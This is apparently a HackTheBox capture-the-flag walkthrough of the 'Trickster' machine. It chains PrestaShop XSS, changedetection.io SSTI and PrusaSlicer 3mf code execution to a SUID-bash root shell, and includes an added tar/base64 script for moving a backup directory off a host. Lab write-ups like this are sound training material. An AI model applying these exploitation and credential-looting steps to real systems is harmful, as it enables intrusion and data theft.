Trickster

Synopsis

Trickster is a medium Linux machine created by EmSec. The subdomain shop.trickster.htb runs PrestaShop version 8.1.5, which is vulnerable to the CVE-2024-34716 XSS vulnerability; exploiting it gives us a shell as www-data. The MySQL database contains the hash of the user james, which is crackable. A Docker container is running, and port 5000 of that container serves changedetection.io version 0.45.20, which is vulnerable to the CVE-2024-32651 SSTI vulnerability that allows RCE. The container contains a Backups directory with a .br file holding adam's credentials. adam is allowed to execute prusaslicer, which is vulnerable to the CVE-2023-47268 arbitrary code execution vulnerability and gives us a shell as root.

OS: Linux
Difficulty: Medium
Points: 30
Release Date: 21-09-2024
Retired Date: 01-02-2025


Enumeration

Nmap

The nmap scan found SSH and HTTP services running.

nmap -p- -Pn -sC -sV --min-rate=1000 10.10.11.34
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-30 19:17 EST
Warning: 10.10.11.34 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.34
Host is up (0.55s latency).
Not shown: 64272 closed tcp ports (conn-refused), 1261 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_  256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://trickster.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.07 seconds

Add the trickster.htb domain to the /etc/hosts file.

Web - trickster.htb

Trickster is an online shopping platform for all our shopping needs.

Visiting the contact and shop endpoints, the contact form and the shop.trickster.htb subdomain are found.

Add shop.trickster.htb to the /etc/hosts file.

Web - shop.trickster.htb

The subdomain lists some products, which we can buy or add to the cart.

The website is built with PrestaShop, an open-source software platform for building e-commerce websites.

Directory enumeration using ffuf reveals the .git directory.

Using gitdumper to dump the contents of the .git directory.

Listing the contents of the dumped .git directory reveals the PrestaShop admin panel path.

PrestaShop version 8.1.5 is vulnerable to XSS via the customer contact form; the details of the vulnerability were released by PrestaShop in their GitHub repository.


Foothold

Shell - www-data [ CVE-2024-34716 Exploit ]

aelmokhtar has published a script for exploiting the vulnerability in a GitHub repository. Git clone the repository.

Change directory to CVE-2024-34716 and run the exploit.py.


Lateral Movement

Pillaging - www-data [ user ]

The PrestaShop config file parameters.php gives us the credentials for the MySQL database.

Shell - james

Upgrade the shell and use the credentials to log into MySQL.

Enumerating the database gives us the hash of james, which we can use for SSH.

The james hash is cracked using hashcat.


The user.txt file contains the user flag 👏


Pivoting

Pillaging - james [ user ]

ps aux reveals that root is running a Docker container and changedetection.py in the /datastore directory.

ip addr reveals the Docker network interface configuration and its IP address.

A ping sweep is used to find the active hosts on the Docker network. Two IP addresses respond: 172.17.0.1 and 172.17.0.2.

A port scan finds port 5000 open.

Pillaging - Port 5000

Curling port 5000 shows that changedetection.io version 0.45.20 is running on the website.

Port forward port 5000 via SSH.

The login page of changedetection.io is presented with a password field.

Using james's password gives us access to changedetection.io.

Shell - Docker Container [ root - CVE-2024-32651 changedetection SSTI ]

changedetection.io is an open-source web page change detection, website watcher, restock monitor and notification service. The source code and documentation are found in its GitHub repository. changedetection.io versions <= 0.45.20 are vulnerable to CVE-2024-32651, a Server Side Template Injection in Jinja2 that allows RCE. More details and a PoC are found in the linked advisory.

Following the above PoC with the payload given below gives us a shell as root in the Docker container.

Settings > Notification > Insert your payload > click on Send test notification


Don't press OK on the alert; it will end the shell.

Pillaging - root [ user - Docker Container ]

Enumerating the /datastore directory, we find the Backups directory, which contains zip files.

nc and unzip are not present on the system.

Shell - adam

I will be using tar to compress the Backups directory and base64 to encode it.

Copy the base64 output and save it into a file on your local machine. Then decode the base64 and decompress it using tar.

Change directory into the Backups directory; unzipping the first file yields a .br file.

The brotli command is used to decompress the .br file. If it is not present on your system, install it with apt.
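The tar/base64 transfer above, as an added shell example that is not from the original write-up, with the integrity check a practitioner wants when the payload is copied off a terminal: the archive's sha256 travels with the base64 text, so a truncated or mangled paste is refused instead of silently producing a broken archive. It assumes GNU coreutils (sha256sum, base64 -d) on both ends; the Backups contents in the demo are constructed.

```shell
#!/bin/sh
# Added example, not from the original write-up: move a directory between two
# hosts over a copy-paste channel when nc and unzip are unavailable, using only
# tar, base64 and sha256sum. The sha256 of the archive is carried with the
# payload so a truncated or mangled paste is detected before extraction.

# Source host: archive DIR and write a two-line text file to OUT:
#   line 1: sha256 of the .tar.gz   line 2: base64 of the .tar.gz (one line)
# Copy both lines from the terminal into a file on the other host.
pack_dir() {
    dir=$1 out=$2
    tgz=$(mktemp)
    tar czf "$tgz" -C "$(dirname "$dir")" "$(basename "$dir")"
    {
        sha256sum "$tgz" | cut -d' ' -f1
        base64 "$tgz" | tr -d '\n'; echo
    } > "$out"
    rm -f "$tgz"
}

# Destination host: read the two-line file IN, decode the archive, refuse to
# extract unless the sha256 matches, then unpack into DEST.
unpack_dir() {
    in=$1 dest=$2
    tgz=$(mktemp)
    sed -n '2p' "$in" | base64 -d > "$tgz"
    want=$(sed -n '1p' "$in")
    got=$(sha256sum "$tgz" | cut -d' ' -f1)
    if [ "$want" != "$got" ]; then
        echo "checksum mismatch: archive was truncated or corrupted in transit" >&2
        rm -f "$tgz"
        return 1
    fi
    mkdir -p "$dest" && tar xzf "$tgz" -C "$dest"
    rm -f "$tgz"
}

# Constructed demo: a stand-in "Backups" directory packed and unpacked locally.
demo=$(mktemp -d)
mkdir -p "$demo/Backups" && echo "sample backup contents" > "$demo/Backups/backup.zip"
pack_dir "$demo/Backups" "$demo/transfer.txt"
unpack_dir "$demo/transfer.txt" "$demo/restored" && ls "$demo/restored/Backups"
```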

Use the credentials to ssh into the system as adam.


Privilege Escalation

Pillaging - adam [ user ]

The user is allowed to run prusaslicer with sudo without a password.

/opt/PrusaSlicer contains two files: the prusaslicer binary and TRICKSTER.3mf.

PrusaSlicer is a popular 3D slicing software designed for FFF (Fused Filament Fabrication) and mSLA (masked Stereolithography) 3D printers. PrusaSlicer is vulnerable to CVE-2023-47268, arbitrary code execution through 3mf files. Exploit-DB has a PoC for this vulnerability.

Shell - root [ CVE-2023-47268 Exploit ]

1. Move the TRICKSTER.3mf file to your local system, because the file belongs to root and we cannot edit it in place.

2. Extract the file Metadata/Slic3r_PE.config.

3. Modify the extracted file to get a shell as root and compress it again.

4. Upload the modified TRICKSTER.3mf and execute it with an output file name, otherwise it gives an error.

5. Check whether /bin/bash has the SUID bit set and execute it to get a root shell.


Change directory to /root; the root.txt file contains the root flag 🎉


Proof of Concept

The video below provides the PoC for the Trickster machine.
